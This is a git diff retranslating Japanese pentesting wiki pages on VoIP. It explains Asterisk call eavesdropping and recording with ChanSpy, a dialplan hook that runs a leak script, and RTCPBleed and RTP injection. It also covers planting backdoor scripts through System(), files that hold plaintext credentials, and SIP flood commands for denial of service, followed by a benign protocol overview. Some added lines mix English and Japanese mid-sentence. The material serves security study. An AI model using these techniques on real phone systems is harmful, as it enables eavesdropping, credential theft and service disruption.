+Asteriskでは、**`ChanSpy`** コマンドを使用して、**監視する内線番号**(またはすべての内線番号)を指定することで、行われている会話を聞くことができます。このコマンドは内線番号に割り当てる必要があります。
 
-例えば、**`exten => 333,1,ChanSpy('all',qb)`** は、**内線番号 333** に**電話をかける**と、**`all`** の内線を**監視**し、静かなモード(**`q`**)で新しい会話が始まるときに**聞き始める**ことを示しています(**`b`**)。私たちはそれに対してインタラクトしたくないからです。**`*`** を押すか、内線番号を入力することで、行われている会話から別の会話に移動することができます。
+例えば、**`exten => 333,1,ChanSpy('all',qb)`** は、**内線番号 333** に**電話をかける**と、**`all`** の内線番号を**監視**し、新しい会話が始まるときに**聞き始め**(**`b`**)、静かなモード(**`q`**)で行います。これは、私たちがその会話に干渉したくないためです。**`*`** を押すか、内線番号を入力することで、行われている会話から別の会話に移動することができます。
 
 特定の内線番号のみを監視するために、**`ExtenSpy`** を使用することも可能です。
 
-会話を聞く代わりに、次のような内線を使用して**ファイルに録音する**こともできます:
+会話を聞く代わりに、内線番号を使用して**ファイルに録音する**こともできます。
 ```scss
 [recorded-context]
 exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
@@ -517,11 +519,11 @@ exten => h,1,System(/tmp/leak_conv.sh &)
 ```
 ### RTCPBleed 脆弱性
 
-**RTCPBleed** は、Asterisk ベースの VoIP サーバーに影響を与える重大なセキュリティ問題です(2017年に公開)。この脆弱性により、VoIP 会話を運ぶ **RTP (Real Time Protocol) トラフィック** が **インターネット上の誰でも傍受およびリダイレクトできる** ようになります。これは、RTP トラフィックが NAT (Network Address Translation) ファイアウォールを通過する際に認証をバイパスするために発生します。
+**RTCPBleed** は、Asterisk ベースの VoIP サーバーに影響を与える重大なセキュリティ問題です(2017年に公開)。この脆弱性により、VoIP 会話を運ぶ **RTP (Real Time Protocol) トラフィック** が **インターネット上の誰でも傍受され、リダイレクトされる** 可能性があります。これは、RTP トラフィックが NAT (Network Address Translation) ファイアウォールを通過する際に認証をバイパスするために発生します。
 
 RTP プロキシは、2 つ以上の当事者間で RTP ストリームをプロキシすることによって RTC システムに影響を与える **NAT の制限** に対処しようとします。NAT が存在する場合、RTP プロキシソフトウェアは、しばしばシグナリング(例:SIP)を通じて取得された RTP IP およびポート情報に依存できません。したがって、いくつかの RTP プロキシは、そのような **IP およびポートのタプルを自動的に学習する** メカニズムを実装しています。これは、受信した RTP トラフィックを検査し、受信した RTP トラフィックのソース IP およびポートを応答すべきものとしてマークすることによって行われます。このメカニズムは「学習モード」と呼ばれることがあり、**いかなる種類の認証も使用しません**。したがって、**攻撃者** は **RTP トラフィックを RTP プロキシに送信し、進行中の RTP ストリームの発信者または受信者に送信されるべきプロキシされた RTP トラフィックを受け取る** ことができます。この脆弱性を RTP Bleed と呼ぶのは、攻撃者が正当なユーザーに送信されるべき RTP メディアストリームを受け取ることを可能にするからです。
 
-RTP プロキシおよび RTP スタックのもう一つの興味深い挙動は、**RTP Bleed に対して脆弱でない場合でも**、**任意のソースからの RTP パケットを受け入れ、転送および/または処理する** ことです。したがって、攻撃者は正当なメディアの代わりに自分のメディアを注入できる RTP パケットを送信できます。この攻撃を RTP 注入と呼ぶのは、既存の RTP ストリームに不正な RTP パケットを注入できるからです。この脆弱性は、RTP プロキシとエンドポイントの両方に存在する可能性があります。
+RTP プロキシと RTP スタックのもう一つの興味深い挙動は、**RTP Bleed に対して脆弱でない場合でも**、**任意のソースからの RTP パケットを受け入れ、転送し、または処理する** ことです。したがって、攻撃者は正当なメディアの代わりに自分のメディアを注入することを可能にする RTP パケットを送信できます。この攻撃を RTP 注入と呼ぶのは、既存の RTP ストリームに不正な RTP パケットを注入することを可能にするからです。この脆弱性は、RTP プロキシとエンドポイントの両方に存在する可能性があります。
 
 Asterisk と FreePBX は伝統的に **`NAT=yes` 設定** を使用しており、これにより RTP トラフィックが認証をバイパスし、通話で音声がないか一方向の音声になる可能性があります。
 
@@ -549,51 +551,51 @@ Asteriskでは、**拡張ルールを追加して再読み込みする**こと
 ```scss
 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
 ```
-**`Shell`**というコマンドは、必要に応じて**`System`**の代わりにシステムコマンドを実行するために使用できます。
+There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary.
 
 > [!WARNING]
-> サーバーが**`System`**コマンドで特定の文字の使用を**禁止している**場合(Elastixのように)、ウェブサーバーが**システム内にファイルを作成することを許可しているか**確認し(Elastixやtrixboxのように)、それを使用して**バックドアスクリプトを作成**し、その後**`System`**を使用してその**スクリプトを実行**します。
+> If the server is **特定の文字の使用を禁止している** in the **`System`** command (like in Elastix), check if the web server allows to **システム内にファイルを作成する方法** (like in Elastix or trixbox), and use it to **バックドアスクリプトを作成** and then use **`System`** to **実行** that **スクリプト**.
 
-#### 興味深いローカルファイルと権限
+#### Interesting local files and permissions
 
-- **`sip.conf`** -> SIPユーザーのパスワードを含みます。
-- **Asteriskサーバーがrootとして実行されている場合**、rootを危険にさらすことができます。
-- **mysql rootユーザー**は**パスワードを持っていない可能性があります**。
-- これを使用して新しいmysqlユーザーをバックドアとして作成できます。
+- **`sip.conf`** -> Contains the password of SIP users.
+- If the **Asterisk server is running as root**, you could compromise root
+- **mysql root user** might **パスワードがない**.
+- this could be used to create a new mysql user as backdoor
 - **`FreePBX`**
-- **`amportal.conf`** -> ウェブパネル管理者(FreePBX)のパスワードを含みます。
-- **`FreePBX.conf`** -> データベースにアクセスするために使用されるFreePBXuserのパスワードを含みます。
-- これを使用して新しいmysqlユーザーをバックドアとして作成できます。
+- **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX)
+- **`FreePBX.conf`** -> Constains the password of the user FreePBXuser used to access the database
+- this could be used to create a new mysql user as backdoor
 - **`Elastix`**
-- **`Elastix.conf`** -> mysql rootパス、IMAPdパス、ウェブ管理者パスなど、いくつかのパスワードが平文で含まれています。
-- **いくつかのフォルダー**は、侵害されたasteriskユーザーに属します(rootとして実行されていない場合)。このユーザーは前述のファイルを読み取ることができ、設定を制御できるため、Asteriskが実行時に他のバックドアバイナリを読み込むようにすることができます。
+- **`Elastix.conf`** -> Contains several passwords in clear text like mysql root pass, IMAPd pass, web admin pass
+- **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed.
 
-### RTPインジェクション
+### RTP Injection
 
-**`rtpinsertsound`**(`sudo apt install rtpinsertsound`)や**`rtpmixsound`**(`sudo apt install rtpmixsound`)などのツールを使用して、会話に**`.wav`**を挿入することが可能です。
+It's possible to insert a **`.wav`** in converstions using tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
 
-または、[http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/)からのスクリプトを使用して、**会話をスキャン**する(**`rtpscan.pl`**)、会話に**`.wav`**を送信する(**`rtpsend.pl`**)、および会話に**ノイズを挿入**する(**`rtpflood.pl`**)ことができます。
+Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **会話をスキャン** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **ノイズを挿入** in a conversation (**`rtpflood.pl`**).
 
 ### DoS
 
-VoIPサーバーでDoSを達成するためのいくつかの方法があります。
+There are several ways to try to achieve DoS in VoIP servers.
 
-- **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS floodはターゲットに無制限のメッセージを送信します。
+- **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.
 - `sippts flood -i 10.10.0.10 -m invite -v`
-- **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS pingはサーバーの応答時間を確認するためにSIP pingを行います。
+- **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time.
 - `sippts ping -i 10.10.0.10`
-- [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): Asteriskで使用されるDoS IAXプロトコル
-- [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): UDP/IP上でSIP/SDP INVITEメッセージの洪水を実行するためのツール。
-- [**rtpflood**](https://www.kali.org/tools/rtpflood/): いくつかの適切に形成されたRTPパケットを送信します。使用されているRTPポートを知る必要があります(最初にスニッフィングしてください)。
-- [**SIPp**](https://github.com/SIPp/sipp): SIPトラフィックを分析および生成することができます。したがって、DoSにも使用できます。
-- [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIPスイスアーミーナイフ。SIP攻撃を実行するためにも使用できます。
-- Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/)、[**voiper**](https://github.com/gremwell/voiper)。
+- [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
+- [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
+- [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
+- [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
+- [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
+- Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
 
-### OSの脆弱性
+### OS Vulnerabilities
 
-Asteriskのようなソフトウェアをインストールする最も簡単な方法は、すでにインストールされている**OSディストリビューション**をダウンロードすることです。例:**FreePBX、Elastix、Trixbox**... これらの問題は、一度動作し始めると、システム管理者が**再度更新しない可能性があり**、**脆弱性**が時間とともに発見されることです。
+The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **再度更新しない** and **脆弱性** are going to be discovered with time.
 
-## 参考文献
+## References
 
 - [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
 - [https://github.com/EnableSecurity/sipvicious](https://github.com/EnableSecurity/sipvicious)
diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
index 95e750892..ef006c917 100644
--- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
+++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
@@ -1,12 +1,12 @@
-# 基本VoIPプロトコル
+# 基本的なVoIPプロトコル
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## 信号プロトコル
+## シグナリングプロトコル
 
 ### SIP (セッション開始プロトコル)
 
-これは業界標準で、詳細については以下を確認してください:
+これは業界標準です。詳細については以下を確認してください:
 
 {{#ref}}
 sip-session-initiation-protocol.md
@@ -14,62 +14,62 @@ sip-session-initiation-protocol.md
 
 ### MGCP (メディアゲートウェイ制御プロトコル)
 
-MGCP (メディアゲートウェイ制御プロトコル) は、RFC 3435で概説された**信号**および**通話** **制御プロトコル**です。これは、3つの主要なコンポーネントからなる集中型アーキテクチャで動作します:
+MGCP (メディアゲートウェイ制御プロトコル) は、RFC 3435で概説された**シグナリング**および**コール** **制御プロトコル**です。これは、3つの主要なコンポーネントからなる集中型アーキテクチャで動作します:
 
-1. **コールエージェントまたはメディアゲートウェイコントローラー (MGC)**: MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。通話のセットアップ、変更、終了プロセスを処理します。MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
-2. **メディアゲートウェイ (MG) またはスレーブゲートウェイ**: これらのデバイスは、**異なるネットワーク間でデジタルメディアストリームを変換**します。例えば、従来の回路交換電話とパケット交換IPネットワークなどです。これらはMGCによって管理され、受信したコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセリングなどの機能が含まれる場合があります。
-3. **信号ゲートウェイ (SG)**: これらのゲートウェイは、**異なるネットワーク間で信号メッセージを変換**する責任があります。これにより、従来の電話システム(例:SS7)とIPベースのネットワーク(例:SIPまたはH.323)間でシームレスな通信が可能になります。信号ゲートウェイは、相互運用性を確保し、異なるネットワーク間で通話制御情報が適切に通信されることを保証するために重要です。
+1. **コールエージェントまたはメディアゲートウェイコントローラー (MGC)**: MGCPアーキテクチャのマスターゲートウェイは、**メディアゲートウェイの管理と制御**を担当します。コールのセットアップ、変更、終了プロセスを処理します。MGCはMGCPプロトコルを使用してメディアゲートウェイと通信します。
+2. **メディアゲートウェイ (MG) またはスレーブゲートウェイ**: これらのデバイスは、**異なるネットワーク間でデジタルメディアストリームを変換**します。例えば、従来の回路交換電話とパケット交換IPネットワークの間です。これらはMGCによって管理され、受信したコマンドを実行します。メディアゲートウェイには、トランスコーディング、パケット化、エコーキャンセリングなどの機能が含まれる場合があります。
+3. **シグナリングゲートウェイ (SG)**: これらのゲートウェイは、**異なるネットワーク間でシグナリングメッセージを変換**する責任があります。これにより、従来の電話システム(例:SS7)とIPベースのネットワーク(例:SIPまたはH.323)間でシームレスな通信が可能になります。シグナリングゲートウェイは、相互運用性を確保し、異なるネットワーク間でコール制御情報が適切に通信されることを保証するために重要です。
 
-要約すると、MGCPは通話制御ロジックをコールエージェントに集中させ、メディアおよび信号ゲートウェイの管理を簡素化し、通信ネットワークにおけるスケーラビリティ、信頼性、効率を向上させます。
+要約すると、MGCPはコール制御ロジックをコールエージェントに集中させ、メディアおよびシグナリングゲートウェイの管理を簡素化し、通信ネットワークにおけるスケーラビリティ、信頼性、および効率を向上させます。
 
 ### SCCP (スキニークライアント制御プロトコル)
 
-スキニークライアント制御プロトコル (SCCP) は、Cisco Systemsが所有する**独自の信号および通話制御プロトコル**です。主に**Cisco Unified Communications Manager**(以前のCallManager)とCisco IP電話または他のCisco音声およびビデオエンドポイント間の通信に使用されます。
+スキニークライアント制御プロトコル (SCCP) は、Cisco Systemsが所有する**独自のシグナリングおよびコール制御プロトコル**です。主に**Cisco Unified Communications Manager**(以前のCallManager)とCisco IP電話または他のCisco音声およびビデオエンドポイント間の通信に使用されます。
 
-SCCPは、通話制御サーバーとエンドポイントデバイス間の通信を簡素化する軽量プロトコルです。「スキニー」と呼ばれるのは、他のVoIPプロトコル(例:H.323やSIP)に比べてミニマリスティックな設計と帯域幅要件が少ないためです。
+SCCPは、コール制御サーバーとエンドポイントデバイス間の通信を簡素化する軽量プロトコルです。「スキニー」と呼ばれるのは、他のVoIPプロトコル(例:H.323やSIP)に比べてミニマリスティックな設計と帯域幅要件が少ないためです。
 
 SCCPベースのシステムの主なコンポーネントは次のとおりです:
 
-1. **通話制御サーバー**: 通常はCisco Unified Communications Managerで、このサーバーは通話のセットアップ、変更、終了プロセス、および通話転送、通話転送、通話保留などの他の電話機能を管理します。
-2. **SCCPエンドポイント**: これらは、IP電話、ビデオ会議ユニット、またはSCCPを使用して通話制御サーバーと通信する他のCisco音声およびビデオエンドポイントなどのデバイスです。これらはサーバーに登録し、信号メッセージを送受信し、通話制御サーバーから提供される指示に従います。
-3. **ゲートウェイ**: これらのデバイス(音声ゲートウェイやメディアゲートウェイなど)は、従来の回路交換電話とパケット交換IPネットワークのような異なるネットワーク間でメディアストリームを変換する責任があります。トランスコーディングやエコーキャンセリングなどの追加機能が含まれる場合もあります。
+1. **コール制御サーバー**: 通常はCisco Unified Communications Managerで、このサーバーはコールのセットアップ、変更、終了プロセス、およびコール転送、コール転送、コールホールドなどの他の電話機能を管理します。
+2. **SCCPエンドポイント**: これらは、IP電話、ビデオ会議ユニット、またはSCCPを使用してコール制御サーバーと通信する他のCisco音声およびビデオエンドポイントなどのデバイスです。これらはサーバーに登録し、シグナリングメッセージを送受信し、コール制御サーバーから提供される指示に従います。
+3. **ゲートウェイ**: これらのデバイス(音声ゲートウェイやメディアゲートウェイなど)は、従来の回路交換電話とパケット交換IPネットワークのような異なるネットワーク間でメディアストリームを変換する責任があります。また、トランスコーディングやエコーキャンセリングなどの追加機能を含む場合があります。
 
-SCCPは、Cisco通話制御サーバーとエンドポイントデバイス間のシンプルで効率的な通信方法を提供します。ただし、**SCCPは独自のプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合、SIPのような他の標準VoIPプロトコルがより適しているかもしれません。
+SCCPは、Ciscoコール制御サーバーとエンドポイントデバイス間のシンプルで効率的な通信方法を提供します。ただし、**SCCPは独自のプロトコル**であるため、非Ciscoシステムとの相互運用性が制限される可能性があります。そのような場合、SIPのような他の標準VoIPプロトコルがより適しているかもしれません。
 
 ### H.323
 
 H.323は、音声、ビデオ、データ会議を含むマルチメディア通信のための**プロトコルスイート**で、パケット交換ネットワーク(IPベースのネットワークなど)上で動作します。これは**国際電気通信連合**(ITU-T)によって開発され、マルチメディア通信セッションを管理するための包括的なフレームワークを提供します。
 
-H.323スイートの主なコンポーネントには次のものが含まれます:
+H.323スイートのいくつかの主要なコンポーネントは次のとおりです:
 
-1. **端末**: これらは、H.323をサポートし、マルチメディア通信セッションに参加できるエンドポイントデバイス(IP電話、ビデオ会議システム、またはソフトウェアアプリケーションなど)です。
-2. **ゲートウェイ**: これらのデバイスは、従来の回路交換電話とパケット交換IPネットワークのような異なるネットワーク間でメディアストリームを変換し、H.323と他の通信システム間の相互運用性を可能にします。トランスコーディングやエコーキャンセリングなどの追加機能が含まれる場合もあります。
-3. **ゲートキーパー**: これらは、H.323ネットワーク内で通話制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、入場制御などの機能を実行し、ネットワークリソースの管理と最適化を支援します。
+1. **端末**: これらは、H.323をサポートし、マルチメディア通信セッションに参加できるIP電話、ビデオ会議システム、またはソフトウェアアプリケーションなどのエンドポイントデバイスです。
+2. **ゲートウェイ**: これらのデバイスは、従来の回路交換電話とパケット交換IPネットワークのような異なるネットワーク間でメディアストリームを変換し、H.323と他の通信システム間の相互運用性を可能にします。また、トランスコーディングやエコーキャンセリングなどの追加機能を含む場合があります。
+3. **ゲートキーパー**: これらは、H.323ネットワーク内でコール制御および管理サービスを提供するオプションのコンポーネントです。アドレス変換、帯域幅管理、入場制御などの機能を実行し、ネットワークリソースの管理と最適化を支援します。
 4. **マルチポイント制御ユニット (MCU)**: これらのデバイスは、複数のエンドポイントからのメディアストリームを管理およびミキシングすることにより、マルチポイント会議を促進します。MCUは、ビデオレイアウト制御、音声アクティブスイッチング、継続的なプレゼンスなどの機能を可能にし、複数の参加者との大規模な会議を開催することを可能にします。
 
-H.323は、音声およびビデオコーデックの範囲、ならびに通話転送、通話転送、通話保留、通話待機などの他の補助サービスをサポートします。VoIPの初期に広く採用されましたが、H.323は、相互運用性が向上し、実装が容易な**セッション開始プロトコル (SIP)**のようなより現代的で柔軟なプロトコルに徐々に置き換えられています。ただし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされています。
+H.323は、音声およびビデオコーデックの範囲、ならびにコール転送、コール転送、コールホールド、コール待機などの他の補助サービスをサポートします。VoIPの初期に広く採用されましたが、H.323は、**セッション開始プロトコル (SIP)**のようなより現代的で柔軟なプロトコルに徐々に置き換えられています。SIPは、より良い相互運用性と簡単な実装を提供します。しかし、H.323は多くのレガシーシステムで使用され続けており、さまざまな機器ベンダーによってサポートされています。
 
 ### IAX (インターアスタリスクエクスチェンジ)
 
-IAX (インターアスタリスクエクスチェンジ) は、主にAsterisk PBX(プライベートブランチ交換)サーバーと他のVoIPデバイス間の通信に使用される**信号および通話制御プロトコル**です。これは、AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323のような他のVoIPプロトコルの代替として開発されました。
+IAX (インターアスタリスクエクスチェンジ) は、主にAsterisk PBX(プライベートブランチ交換)サーバーと他のVoIPデバイス間の通信に使用される**シグナリングおよびコール制御プロトコル**です。これは、AsteriskオープンソースPBXソフトウェアの作成者であるMark Spencerによって、SIPやH.323などの他のVoIPプロトコルの代替として開発されました。
 
-IAXは、その**シンプルさ、効率性、実装の容易さ**で知られています。IAXの主な特徴は次のとおりです:
+IAXは、その**シンプルさ、効率性、および実装の容易さ**で知られています。IAXのいくつかの主要な機能は次のとおりです:
 
-1. **単一UDPポート**: IAXは、信号とメディアトラフィックの両方に単一のUDPポート(4569)を使用し、ファイアウォールやNATのトラバーサルを簡素化し、さまざまなネットワーク環境での展開を容易にします。
-2. **バイナリプロトコル**: SIPのようなテキストベースのプロトコルとは異なり、IAXはバイナリプロトコルであり、帯域幅消費を削減し、信号およびメディアデータの送信をより効率的にします。
-3. **トランキング**: IAXはトランキングをサポートしており、複数の通話を単一のネットワーク接続に結合することができ、オーバーヘッドを削減し、帯域幅の利用を改善します。
-4. **ネイティブ暗号化**: IAXは、RSAのような方法を使用して鍵交換を行い、AESによるメディア暗号化を提供する暗号化のサポートを組み込んでおり、エンドポイント間の安全な通信を提供します。
-5. **ピアツーピア通信**: IAXは、中央サーバーを必要とせずにエンドポイント間で直接通信するために使用でき、よりシンプルで効率的な通話ルーティングを可能にします。
+1. **単一UDPポート**: IAXは、シグナリングとメディアトラフィックの両方に単一のUDPポート(4569)を使用し、ファイアウォールやNATのトラバーサルを簡素化し、さまざまなネットワーク環境での展開を容易にします。
+2. **バイナリプロトコル**: SIPのようなテキストベースのプロトコルとは異なり、IAXはバイナリプロトコルであり、帯域幅の消費を減少させ、シグナリングおよびメディアデータの送信をより効率的にします。
+3. **トランキング**: IAXはトランキングをサポートしており、複数のコールを単一のネットワーク接続に結合することができ、オーバーヘッドを削減し、帯域幅の利用を改善します。
+4. **ネイティブ暗号化**: IAXは、RSAを使用した鍵交換やAESを使用したメディア暗号化などの方法で暗号化をサポートしており、エンドポイント間の安全な通信を提供します。
+5. **ピアツーピア通信**: IAXは、中央サーバーを必要とせずにエンドポイント間で直接通信するために使用でき、よりシンプルで効率的なコールルーティングを可能にします。
 
-利点にもかかわらず、IAXにはいくつかの制限があります。主にAsteriskエコシステムに焦点を当てており、SIPのようなより確立されたプロトコルに比べて広く採用されていません。そのため、非Asteriskシステムやデバイスとの相互運用性には最適ではないかもしれません。ただし、Asterisk環境内で作業している人々にとって、IAXはVoIP通信のための堅牢で効率的なソリューションを提供します。
+利点にもかかわらず、IAXにはいくつかの制限があります。主にAsteriskエコシステムに焦点を当てており、SIPのようなより確立されたプロトコルに比べて広く採用されていません。そのため、非Asteriskシステムやデバイスとの相互運用性には最適ではないかもしれません。しかし、Asterisk環境内で作業する人々にとって、IAXはVoIP通信のための堅牢で効率的なソリューションを提供します。
 
 ## 伝送および輸送プロトコル
 
 ### SDP (セッション記述プロトコル)
 
-SDP (セッション記述プロトコル) は、IPネットワーク上での音声、ビデオ、またはデータ会議などのマルチメディアセッションの特性を記述するために使用される**テキストベースのフォーマット**です。これは**インターネット技術者タスクフォース (IETF)**によって開発され、**RFC 4566**で定義されています。SDPは実際のメディア伝送やセッションの確立を処理せず、**SIP (セッション開始プロトコル)**のような他の信号プロトコルと組み合わせて、メディアストリームとその属性に関する情報を交渉および交換するために使用されます。
+SDP (セッション記述プロトコル) は、IPネットワーク上での音声、ビデオ、またはデータ会議などのマルチメディアセッションの特性を記述するために使用される**テキストベースのフォーマット**です。これは**インターネット技術者タスクフォース (IETF)**によって開発され、**RFC 4566**で定義されています。SDPは実際のメディア伝送やセッションの確立を処理せず、**SIP (セッション開始プロトコル)**のような他のシグナリングプロトコルと組み合わせて、メディアストリームとその属性に関する情報を交渉および交換するために使用されます。
 
-SDPの主な要素は次のとおりです:
+SDPのいくつかの重要な要素は次のとおりです:
 
 1. **セッション情報**: SDPは、セッション名、セッションの説明、開始時刻、終了時刻など、マルチメディアセッションの詳細を記述します。
 2. **メディアストリーム**: SDPは、メディアタイプ(音声、ビデオ、またはテキスト)、輸送プロトコル(例:RTPまたはSRTP)、およびメディアフォーマット(例:コーデック情報)など、メディアストリームの特性を定義します。
@@ -79,18 +79,18 @@ SDPの主な要素は次のとおりです:
 SDPは通常、次のプロセスで使用されます:
 
 1. 開始する当事者が、メディアストリームとその属性の詳細を含む提案されたマルチメディアセッションのSDP記述を作成します。
-2. SDP記述は、通常、SIPやRTSPのような信号プロトコルメッセージ内に埋め込まれて受信者に送信されます。
+2. SDP記述は、通常、SIPやRTSPのようなシグナリングプロトコルメッセージ内に埋め込まれて受信者に送信されます。
 3. 受信者はSDP記述を処理し、その能力に基づいて、提案されたセッションを受け入れる、拒否する、または変更することがあります。
-4. 最終的なSDP記述は、信号プロトコルメッセージの一部として開始する当事者に返送され、交渉プロセスが完了します。
+4. 最終的なSDP記述は、シグナリングプロトコルメッセージの一部として開始する当事者に返送され、交渉プロセスが完了します。
 
 SDPのシンプルさと柔軟性は、さまざまな通信システムでマルチメディアセッションを記述するための広く採用された標準となっており、IPネットワーク上でリアルタイムのマルチメディアセッションを確立および管理する上で重要な役割を果たします。
 
 ### RTP / RTCP / SRTP / ZRTP
 
-1. **RTP (リアルタイムトランスポートプロトコル)**: RTPは、IPネットワーク上で音声およびビデオデータ、または他のリアルタイムメディアを配信するために設計されたネットワークプロトコルです。**IETF**によって開発され、**RFC 3550**で定義されているRTPは、SIPやH.323のような信号プロトコルと一般的に使用され、マルチメディア通信を可能にします。RTPは、メディアストリームの**同期**、**シーケンシング**、および**タイムスタンプ**のメカニズムを提供し、スムーズでタイムリーなメディア再生を確保します。
-2. **RTCP (リアルタイムトランスポート制御プロトコル)**: RTCPはRTPの補完プロトコルで、サービス品質(QoS)を監視し、メディアストリームの伝送に関するフィードバックを提供するために使用されます。RTPと同じ**RFC 3550**で定義されているRTCPは、**RTPセッションの参加者間で制御パケットを定期的に交換**します。パケットロス、ジッター、往復時間などの情報を共有し、ネットワーク条件に適応し、全体的なメディア品質を向上させるのに役立ちます。
-3. **SRTP (セキュアリアルタイムトランスポートプロトコル)**: SRTPは、メディアストリームに対して**暗号化**、**メッセージ認証**、および**再生防止**を提供するRTPの拡張です。**RFC 3711**で定義されており、SRTPはAESのような暗号化アルゴリズムとHMAC-SHA1のようなメッセージ認証を使用します。SRTPは、SIP over TLSのような安全な信号プロトコルと組み合わせて使用され、マルチメディア通信におけるエンドツーエンドのセキュリティを提供します。
-4. **ZRTP (ジマーマンリアルタイムトランスポートプロトコル)**: ZRTPは、RTPメディアストリームに対して**エンドツーエンドの暗号化**を提供する暗号鍵合意プロトコルです。PGPの作成者であるPhil Zimmermannによって開発され、**RFC 6189**で説明されています。ZRTPは、鍵交換のために信号プロトコルに依存するSRTPとは異なり、信号プロトコルとは独立して機能するように設計されています。**Diffie-Hellman鍵交換**を使用して、通信する当事者間で共有秘密を確立し、事前の信頼や公開鍵基盤(PKI)を必要としません。ZRTPには、マンインザミドル攻撃から保護するための**短い認証文字列 (SAS)**などの機能も含まれています。
+1. **RTP (リアルタイムトランスポートプロトコル)**: RTPは、IPネットワーク上で音声およびビデオデータ、または他のリアルタイムメディアを配信するために設計されたネットワークプロトコルです。**IETF**によって開発され、**RFC 3550**で定義されているRTPは、SIPやH.323のようなシグナリングプロトコルと一般的に使用され、マルチメディア通信を可能にします。RTPは、メディアストリームの**同期**、**シーケンシング**、および**タイムスタンプ**のメカニズムを提供し、スムーズでタイムリーなメディア再生を確保します。
+2. **RTCP (リアルタイムトランスポート制御プロトコル)**: RTCPはRTPの補完プロトコルで、サービス品質(QoS)を監視し、メディアストリームの伝送に関するフィードバックを提供するために使用されます。RTPと同じ**RFC 3550**で定義されているRTCPは、**RTPセッションの参加者間で制御パケットを定期的に交換**します。パケットロス、ジッター、往復時間などの情報を共有し、ネットワーク条件に適応し、全体的なメディア品質を改善するのに役立ちます。
+3. **SRTP (セキュアリアルタイムトランスポートプロトコル)**: SRTPは、メディアストリームに対して**暗号化**、**メッセージ認証**、および**再生保護**を提供するRTPの拡張です。これにより、機密の音声およびビデオデータの安全な伝送が確保されます。**RFC 3711**で定義されているSRTPは、AESのような暗号化アルゴリズムとHMAC-SHA1のようなメッセージ認証を使用します。SRTPは、SIP over TLSのような安全なシグナリングプロトコルと組み合わせて使用され、マルチメディア通信におけるエンドツーエンドのセキュリティを提供します。
+4. **ZRTP (ジマーマンリアルタイムトランスポートプロトコル)**: ZRTPは、RTPメディアストリームに対して**エンドツーエンドの暗号化**を提供する暗号鍵合意プロトコルです。PGPの作成者であるPhil Zimmermannによって開発され、**RFC 6189**で説明されています。ZRTPは、鍵交換のためにシグナリングプロトコルに依存するSRTPとは異なり、シグナリングプロトコルとは独立して機能するように設計されています。ZRTPは、**Diffie-Hellman鍵交換**を使用して、通信する当事者間で共有秘密を確立し、事前の信頼や公開鍵インフラストラクチャ(PKI)を必要としません。ZRTPには、マンインザミドル攻撃から保護するための**短い認証文字列 (SAS)**などの機能も含まれています。
 
 これらのプロトコルは、**IPネットワーク上でのリアルタイムマルチメディア通信の配信とセキュリティにおいて重要な役割を果たします**。RTPとRTCPは実際のメディア伝送と品質監視を処理し、SRTPとZRTPは、送信されたメディアが盗聴、改ざん、再生攻撃から保護されることを保証します。
 
diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md
index 87b266de7..dc4ead969 100644
--- a/src/network-services-pentesting/pentesting-web/README.md
+++ b/src/network-services-pentesting/pentesting-web/README.md
